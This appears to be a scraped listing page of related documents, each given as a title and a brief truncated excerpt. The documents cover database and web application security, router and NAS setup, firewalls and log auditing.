Securing Data on Microsoft SQL Server 2012

Securing Data on Microsoft SQL Server 2012 Securing Data on Microsoft SQL Server 2012 Course 55096 The goal of this two-day instructor-led course is to provide students with the database and SQL server security knowledge and skills necessary to

More information

Chapter 1 Web Application (In)security 1

Chapter 1 Web Application (In)security 1 Introduction xxiii Chapter 1 Web Application (In)security 1 The Evolution of Web Applications 2 Common Web Application Functions 4 Benefits of Web Applications 5 Web Application Security 6 "This Site Is

More information

Steltronic Focus. Main Desk Internet connection

Steltronic Focus. Main Desk Internet connection Steltronic Focus Main Desk Steltronic S.p.A. Via Artigianale 34, 25082 Botticino Sera Brescia - Italy Tel: +39 030 2190811 fax: +39 030 2190798 Service: + 39 030 2190830 http: www.steltronic.com Service:

More information

Hardware + Software Solutions for The Best in Client Management & Security. Malcolm Hay Intel Technology Manager

Hardware + Software Solutions for The Best in Client Management & Security. Malcolm Hay Intel Technology Manager Hardware + Software Solutions for The Best in Client Management & Security Malcolm Hay Intel Manager vpro - Hardware Management & Security for the New Era of End User Computing Hardware Management Intel

More information

How to setup camera with NAS

How to setup camera with NAS How to setup camera with NAS V.150714 This article describes how to set up a Phylink camera with your NAS driver. Once your camera is authorized to access the NAS, it will be able to record its snapshots

More information

Hacking Web Apps. Detecting and Preventing Web Application Security Problems. Jorge Blanco Alcover. Mike Shema. Technical Editor SYNGRESS

Hacking Web Apps. Detecting and Preventing Web Application Security Problems. Jorge Blanco Alcover. Mike Shema. Technical Editor SYNGRESS Hacking Web Apps Detecting and Preventing Web Application Security Problems Mike Shema Technical Editor Jorge Blanco Alcover AMSTERDAM BOSTON HEIDELBERG LONDON NEW YORK OXFORD PARIS SAN DIEGO SAN FRANCISCO

More information

05.0 Application Development

05.0 Application Development Number 5.0 Policy Owner Information Security and Technology Policy Application Development Effective 01/01/2014 Last Revision 12/30/2013 Department of Innovation and Technology 5. Application Development

More information

ReadyNAS Duo Setup Manual

ReadyNAS Duo Setup Manual ReadyNAS Duo Setup Manual NETGEAR, Inc. 4500 Great America Parkway Santa Clara, CA 95054 USA February 2008 208-10215-01 v1.0 2008 by NETGEAR, Inc. All rights reserved. Trademarks NETGEAR, the NETGEAR logo,

More information

SERENA SOFTWARE Serena Service Manager Security

SERENA SOFTWARE Serena Service Manager Security SERENA SOFTWARE Serena Service Manager Security 2014-09-08 Table of Contents Who Should Read This Paper?... 3 Overview... 3 Security Aspects... 3 Reference... 6 2 Serena Software Operational Security (On-Demand

More information

Remote Attacks Against SOHO Routers. 08 February, 2010 Craig Heffner

Remote Attacks Against SOHO Routers. 08 February, 2010 Craig Heffner Remote Attacks Against SOHO Routers 08 February, 2010 Craig Heffner Abstract This paper will describe how many consumer (SOHO) routers can be exploited via DNS re-binding to gain interactive access to

More information

CMPT 471 Networking II

CMPT 471 Networking II CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access

More information

How To Check If Your Router Is Working Properly On A Nr854T Router (Wnr854) On A Pc Or Mac) On Your Computer Or Ipad (Netbook) On An Ipad Or Ipa (Networking

How To Check If Your Router Is Working Properly On A Nr854T Router (Wnr854) On A Pc Or Mac) On Your Computer Or Ipad (Netbook) On An Ipad Or Ipa (Networking Chapter 7 Using Network Monitoring Tools This chapter describes how to use the maintenance features of your RangeMax NEXT Wireless Router WNR854T. These features can be found by clicking on the Maintenance

More information

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research

National Information Security Group The Top Web Application Hack Attacks. Danny Allan Director, Security Research National Information Security Group The Top Web Application Hack Attacks Danny Allan Director, Security Research 1 Agenda Web Application Security Background What are the Top 10 Web Application Attacks?

More information

Developing ASP.NET MVC 4 Web Applications MOC 20486

Developing ASP.NET MVC 4 Web Applications MOC 20486 Developing ASP.NET MVC 4 Web Applications MOC 20486 Course Outline Module 1: Exploring ASP.NET MVC 4 The goal of this module is to outline to the students the components of the Microsoft Web Technologies

More information

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2

Advanced Web Technology 10) XSS, CSRF and SQL Injection 2 Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 Table of Contents Cross Site Request Forgery - CSRF Presentation

More information

Enterprise Application Security Workshop Series

Enterprise Application Security Workshop Series Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants

More information

What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things.

What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. What s Wrong with Information Security Today? You are looking in the wrong places for the wrong things. AGENDA Current State of Information Security Data Breach Statics Data Breach Case Studies Why current

More information

Guidance End User Devices Security Guidance: Apple ios 7

Guidance End User Devices Security Guidance: Apple ios 7 GOV.UK Guidance End User Devices Security Guidance: Apple ios 7 Updated 10 June 2014 Contents 1. Changes since previous guidance 2. Usage Scenario 3. Summary of Platform Security 4. How the Platform Can

More information

Chapter 6 Using Network Monitoring Tools

Chapter 6 Using Network Monitoring Tools Chapter 6 Using Network Monitoring Tools This chapter describes how to use the maintenance features of your Wireless-G Router Model WGR614v9. You can access these features by selecting the items under

More information

IP PBX. SD Card Slot. FXO Ports. PBX WAN port. FXO Ports LED, RED means online

IP PBX. SD Card Slot. FXO Ports. PBX WAN port. FXO Ports LED, RED means online 1 IP PBX SD Card Slot FXO Ports PBX LAN port PBX WAN port FXO Ports LED, RED means online 2 Connect the IP PBX to Your LAN Internet PSTN Router Ethernet Switch FXO Ports 3 Access the PBX s WEB GUI The

More information

Who is Watching You? Video Conferencing Security

Who is Watching You? Video Conferencing Security Who is Watching You? Video Conferencing Security Navid Jam Member of Technical Staff March 1, 2007 SAND# 2007-1115C Computer and Network Security Security Systems and Technology Video Conference and Collaborative

More information

Log Audit Ensuring Behavior Compliance Secoway elog System

Log Audit Ensuring Behavior Compliance Secoway elog System As organizations strengthen informatization construction, their application systems (service systems, operating systems, databases, and Web servers), security devices (firewalls and the UTM, IPS, IDS,

More information

Concierge SIEM Reporting Overview

Concierge SIEM Reporting Overview Concierge SIEM Reporting Overview Table of Contents Introduction... 2 Inventory View... 3 Internal Traffic View (IP Flow Data)... 4 External Traffic View (HTTP, SSL and DNS)... 5 Risk View (IPS Alerts

More information